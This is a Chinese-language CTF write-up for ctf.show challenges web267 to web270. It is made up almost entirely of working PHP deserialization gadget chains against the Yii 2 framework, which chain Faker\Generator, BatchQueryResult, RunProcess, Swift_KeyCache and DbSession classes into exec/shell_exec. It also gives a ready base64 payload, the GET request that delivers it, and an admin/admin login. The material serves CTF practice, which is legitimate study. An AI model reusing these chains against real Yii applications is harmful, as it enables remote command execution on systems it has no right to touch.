web267
查看源代码发现这三个页面
然后发现登录页面直接admin/admin
登录成功
然后发现about页面有细微变化
然后看到了
///backdoor/shell
unserialize(base64_decode($_GET['code']))
EXP
<?php
namespace yii\rest{
class IndexAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='exec';
$this->id='cat /flag >3.txt';
}
}
}
namespace Faker{
use yii\rest\IndexAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close']=[new IndexAction(),'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader=new Generator();
}
}
}
namespace {
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
?>
传参GET:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjExOiJscyAvID4xLnR4dCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
访问
http://08a2bbcd-9f38-4806-bf8d-902d04e4a1fc.challenge.ctf.show/3.txt
传参完之后可能会报错但是不管他,继续访问
web268
一样的操作
EXP
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='shell_exec';
$this->id='tac /f* | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['isRunning']=[new CreateAction(),'run'];
}
}
}
namespace Codeception\Extension{
use Faker\Generator;
class RunProcess{
private $processes;
public function __construct(){
$this->processes=[new Generator()];
}
}
}
namespace {
echo base64_encode((serialize(new Codeception\Extension\RunProcess())));
}
?>
忘记解释了shell_exec是一个用于在 shell 中执行命令,并返回输出的php系统函数
id='cat /flags | tee 2.txt';
用于绕过
|(管道符号): 管道符号用于将前一个命令的输出作为后一个命令的输入。在这里,它将cat /flags命令的输出作为下一个命令的输入。
tee命令的作用是读取标准输入的数据,并同时将其写入到指定的文件以及标准输出。
web269
EXP
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='shell_exec';
$this->id='cat /flagsa | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['render']=[new CreateAction(),'run'];
}
}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Faker\Generator;
class See{
protected $description;
public function __construct(){
$this->description=new Generator();
}
}
}
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\See;
class Swift_KeyCache_DiskKeyCache{
private $keys=[];
private $path;
public function __construct(){
$this->path=new See;
$this->keys=array(
"axin"=>array("is"=>"handsome")
);
}
}
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>
web270
EXP
<?php
namespace yii\rest{
class IndexAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='shell_exec';
$this->id='cat /flagsaa | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace yii\web{
use yii\rest\IndexAction;
class DbSession{
public $writeCallback;
public function __construct(){
$this->writeCallback=[new IndexAction(),'run'];
}
}
}
namespace yii\db{
use yii\web\DbSession;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader=new DbSession();
}
}
}
namespace {
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
?>